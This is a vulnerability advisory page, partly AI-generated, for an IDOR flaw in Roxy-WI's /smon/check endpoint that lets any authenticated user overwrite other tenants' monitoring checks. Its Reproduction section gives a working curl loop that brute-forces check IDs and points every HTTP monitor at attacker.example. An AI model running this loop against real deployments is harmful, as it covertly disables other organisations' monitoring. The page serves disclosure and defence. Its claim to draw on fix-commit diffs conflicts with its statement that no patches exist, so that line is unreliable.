CVE-2026-45550
Description
Roxy-WI versions prior to 8.2.6.4 allow authenticated users to modify any monitoring check due to insufficient access controls.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Roxy-WI versions prior to 8.2.6.4 allow authenticated users to modify any monitoring check due to insufficient access controls.
Vulnerability
Roxy-WI versions 8.2.6.4 and prior contain an Insecure Direct Object Reference (IDOR) vulnerability in the PUT /smon/check endpoint. The endpoint only verifies that the authenticated user belongs to a group, but does not check if the target smon_id belongs to that user's group. This allows any authenticated user to modify monitoring checks belonging to other tenants [1].
Exploitation
An attacker needs to be authenticated to Roxy-WI. The attacker can then send a crafted PUT request to the /smon/check endpoint, providing a check_id belonging to another user's monitoring configuration and new values for the check. The application will then update the monitoring check without proper authorization verification [1].
Impact
Successful exploitation allows any authenticated user to silently rewrite the configuration of any monitoring check, including HTTP, TCP, Ping, and DNS checks. This could lead to the disruption of monitoring services or the redirection of traffic to malicious destinations, depending on the nature of the monitoring check being modified [1].
Mitigation
At the time of publication, there are no publicly available patches for this vulnerability. Users are advised to monitor the project's security advisories for updates. It is recommended to restrict access to Roxy-WI to only trusted users until a patch is released [1].
AI Insight generated on Jun 10, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
1Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"The application fails to properly filter database updates by user group, allowing any authenticated user to modify another tenant's monitoring checks."
Attack vector
An authenticated user can send a PUT request to `/smon/check` with a target `check_id` belonging to another tenant. The application only verifies that the caller has a group membership, not that the target `check_id` belongs to that group. This allows the attacker to overwrite monitoring configurations like URLs or bodies for any check ID. The advisory notes that even a guest role suffices for this attack [ref_id=1].
Affected code
The vulnerability lies in the PUT request handling for `/smon/check` in `app/routes/smon/routes.py`. Specifically, the `roxywi_common.check_user_group_for_flask()` function only checks for caller group membership. The downstream SQL update functions `update_smon`, `update_smonHttp`, `update_smonTcp`, `update_smonPing`, and `update_smonDns` in `app/modules/db/smon.py` execute updates with a `WHERE smon_id = ?` clause lacking a user group filter, unlike the correctly filtered DELETE path.
What the fix does
The advisory indicates that no patches are publicly available at the time of publication. The recommended remediation is to apply a user_group filter to the `update_smon` SQL query and similar functions for HTTP, TCP, Ping, and DNS checks. Additionally, a check should be added at the route level to ensure the `check_id` belongs to the caller's group before allowing the update to prevent foreign checks from being modified [ref_id=1].
Preconditions
- authAn authenticated user session is required.
Reproduction
# Logged-in as a role=3 user in tenant1, with NO membership in tenant2. # Brute-force iterate the small smon_id space: for ID in $(seq 1 200); do curl $COOKIE -H 'Content-Type: application/json' \ -X PUT "https://$TARGET/smon/check" -d @- <<JSON {"check_id": $ID, "check_type": "http", "name": "x", "ip":"x.x", "port":"443", "enabled":"0", "url":"http://attacker.example/oast","body":"", "group":"", "desc":"hijacked", "tg":"0","slack":"0","pd":"0","mm":"0", "resolver":"","record_type":"a","packet_size":"56", "http_method":"GET","interval":"60","agent_id":"1"} JSON done Every existing HTTP monitor in the Roxy-WI deployment is now polling attacker.example/oast. The original tenant's "service is healthy" indicator stays green because the URL the agent polls returns 200; meanwhile their real production endpoint is no longer being monitored. [ref_id=1]
Generated on Jun 10, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1News mentions
0No linked articles in our index yet.